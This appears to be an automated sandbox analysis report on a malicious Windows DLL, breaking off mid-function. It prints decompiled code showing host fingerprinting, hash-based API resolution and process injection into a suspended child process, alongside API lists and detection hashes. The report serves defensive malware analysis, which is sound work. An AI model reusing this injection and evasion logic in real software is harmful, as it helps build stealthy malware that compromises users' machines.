				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x2ecfaa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x2ecfaa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x2ecfaa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x2ecfaa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x2ecfaa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x2ecfaa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x2ecfaa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x2ecfaa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x2ecfaa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x2ecfaa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetCurrentProcessId.KERNEL32 ref: 1000D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
GetCurrentProcess.KERNEL32 ref: 1000D09F
LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
GetLastError.KERNEL32 ref: 1000D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
GetLastError.KERNEL32 ref: 1000D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
GetCurrentProcess.KERNEL32 ref: 1000D20E

Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06

memset.MSVCRT ref: 1000D229
GetVersionExA.KERNEL32(00000000), ref: 1000D234
GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
GetSystemInfo.KERNEL32(?), ref: 1000D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287

Strings

TEMP, xrefs: 1000D328, 1000D333, 1000D344
USERPROFILE, xrefs: 1000D2E4, 1000D312
SystemDrive, xrefs: 1000D353, 1000D35E, 1000D373
%s\%s, xrefs: 1000D2F9
TEMP, xrefs: 1000D2F3

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 1475707489-2706916422
Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
SetLastError.KERNEL32(000000AA), ref: 100060D7

Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
GetLastError.KERNEL32 ref: 10005FEF
memset.MSVCRT ref: 10006013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
GetFileAttributesW.KERNEL32(00000000), ref: 10006083
CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7

Strings

Hello qqq, xrefs: 10005F8D

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 3435743081-3610097158
Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}

APIs

memset.MSVCRT ref: 1000B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821

Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D

lstrcatW.KERNEL32 ref: 1000B85A
CharUpperBuffW.USER32(?,00000000), ref: 1000B86C

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x2ecfaa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x2ecfaa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
memset.MSVCRT ref: 1000ABD6
Process32First.KERNEL32(00000000,?), ref: 1000ABED
Process32Next.KERNEL32(00000000,?), ref: 1000AC21
CloseHandle.KERNEL32(00000000), ref: 1000AC2E

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
String ID:
API String ID: 1267121359-0
Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

APIs

LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089

Strings

.dll, xrefs: 1000E079, 1000E07C

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x2e50590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x2ecfaa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x2ecfaa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x2ecfaa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x2ecfaa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x2ecfaa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x2ecfaa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

APIs

Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

GetLastError.KERNEL32(?,00000001), ref: 1000CACC
ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
String ID:
API String ID: 1274669455-0
Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000ae6f
0x1000ae75
0x1000ae79
0x1000ae7a
0x1000ae7b
0x1000ae7c
0x1000ae80
0x1000ae85
0x1000ae8d
0x1000aea5
0x1000aeab
0x1000aeb3

APIs

memset.MSVCRT ref: 1000AE85
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085C2( &_v8);
				return _t25;
			}

0x1000e1bf
0x1000e1c2
0x1000e1c8
0x1000e1ca
0x1000e1cf
0x1000e1d1
0x1000e1db
0x1000e1dc
0x1000e1eb
0x1000e1de
0x1000e1de
0x1000e1de
0x1000e1ef
0x1000e1f6
0x1000e1fc
0x1000e1fc
0x1000e201
0x1000e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
